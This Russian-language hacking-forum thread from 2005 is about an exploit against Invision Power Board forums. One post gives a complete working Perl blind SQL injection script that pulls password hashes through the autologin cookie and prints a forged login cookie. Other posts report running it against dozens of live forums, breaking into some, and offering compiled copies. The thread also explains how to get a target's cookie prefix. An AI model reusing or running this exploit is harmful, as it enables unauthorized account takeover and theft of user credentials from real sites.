Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
с кем можно пообщатся насчет сплойта который тянет соль? |
17.12.2005, 03:02
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме:
75754
Репутация:
1
|
|
с кем можно пообщатся насчет сплойта который тянет соль?
типа оффтоп. но если будете тереть., киньте в личку пожалуйста ответ.
насчет сплойта для ипб,который тянет соль и который во всем инете битый (типа защита от дурака :-)))
у меня с перлом ну ооочень плохо, так что после нескольких часов напряженного скрипения мозгами примерно исправила там где примерно мне показалось, было неправильно :d :d :d
мнэ... самое интересное, что когда его запустила, он мне выдал строку, очень похожую на хеш пароля!!!
(32 символа и все такое....). но вот сижу бручу уже очень долго и никак не могу расбрутить.
вопрос, с кем можно проконсульироваться насчет кода (в том смысле правильно ли я исправила и просто пасс сложный) или может мне просто выдается какаято левая фигня похожая на хеш пасса и дальше мне мучаться с ним не стоит?
зы. извините что много написала.
зызы. перед тем как стереть,ответьте в личку плз
|
|
|
17.12.2005, 04:11
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807
Репутация:
901
|
|
Полностью рабочий вариант сплоита
#!/usr/bin/perl -w
use IO::Socket;
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $host = $ARGV[0]; # hostname
my $path = $ARGV[1] . 'index.php?act=Login&CODE=autologin';
my $user = $ARGV[2]; # userid to jack
my $iver = $ARGV[3]; # version 1 or 2
if($ARGV[4]) { $cpre = $ARGV[4] } else { $cpre = "" }
my $dbug = $ARGV[5]; # debug?
if (!$ARGV[3])
{
print "... By rav3n Usage: ipb_skides.pl site.org /forum/ [id] [ver1/2] [cookie_prefix] [debug].\n\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b"," c","d","e","f");
my $outputs = '';
M1:
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d% 2527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$ i,1)%3d%2527$current%2527)/*";
$cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "FAILED\n\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Cookie: $cookie\n";
print $socket "Connection: close\n\n";
# If we get a valid sql request then this
# does not appear anywhere in the Location header
$pattern = 'act=Login&CODE=';
$failed = 0;
while(<$socket>)
{
if($dbug) { print };
if(/$pattern/) { $failed = 1; }
}
if($failed==0){
$outputs .= $current;
print "$i char: $current\n";
next M1;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
Последний раз редактировалось SladerNon; 17.12.2005 в 04:23..
|
|
|
|
18.12.2005, 02:59
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме:
75754
Репутация:
1
|
|
во первых хочу сказать всем спасибо
во вторых хочу поздравить себя с тем ято я правильно исправила сплойт!!!
в третих хочу спросить, а какой вобще процент форумов на которых у работает этот сплойт? а то у меня вобще фигня какаято. уже штук 50 перебрала, только на двух сработало. да и то один заброшеный, а на втором аж 18 юзеров. вобще не весело както ((((
2SladerNon
ага. спасибо. но это несовсем тот сплойт. вернее совсем не тот.
кстате если скажеш откуда брать куки префикс, буду тебе благодарна
Последний раз редактировалось Danya; 18.12.2005 в 03:09..
|
|
|
|
18.12.2005, 03:32
|
|
Участник форума
Регистрация: 18.07.2005
Сообщений: 123
Провел на форуме:
341668
Репутация:
60
|
|
Сообщение от Danya
во первых хочу сказать всем спасибо
во вторых хочу поздравить себя с тем ято я правильно исправила сплойт!!!
в третих хочу спросить, а какой вобще процент форумов на которых у работает этот сплойт? а то у меня вобще фигня какаято. уже штук 50 перебрала, только на двух сработало. да и то один заброшеный, а на втором аж 18 юзеров. вобще не весело както ((((
2SladerNon
ага. спасибо. но это несовсем тот сплойт. вернее совсем не тот.
кстате если скажеш откуда брать куки префикс, буду тебе благодарна
Сплойт мало-работает, т.к. дырка уже совсем бородатая.
кУки префикс надо сначала в собственном брАузере посмотреть зарегистрировавшись на таргет форуме.
|
|
|
|
18.12.2005, 08:47
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754
Репутация:
97
|
|
да почему же... есть еще много дырявых форумов даже версий 1.*.*
нужно искать просто получше...
вчера парочку сломала к примеру)
если нужен компилированный сплойт стукнись в личку.
|
|
|
|
19.12.2005, 01:10
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме:
75754
Репутация:
1
|
|
поюзала сплойт (который в рамочке),
оно мне написало: 1 char: 7
и что теперь с этим делать, извиняюсь......
|
|
|
|
19.12.2005, 01:19
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
"7" это только первый символ хэша=)))
|
|
|
|
22.12.2005, 02:39
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме:
75754
Репутация:
1
|
|
спасибо. а все остальные я сама должна угадать, или как?
|
|
|
|
22.12.2005, 06:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
А сплойт от Коула не пашет?
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
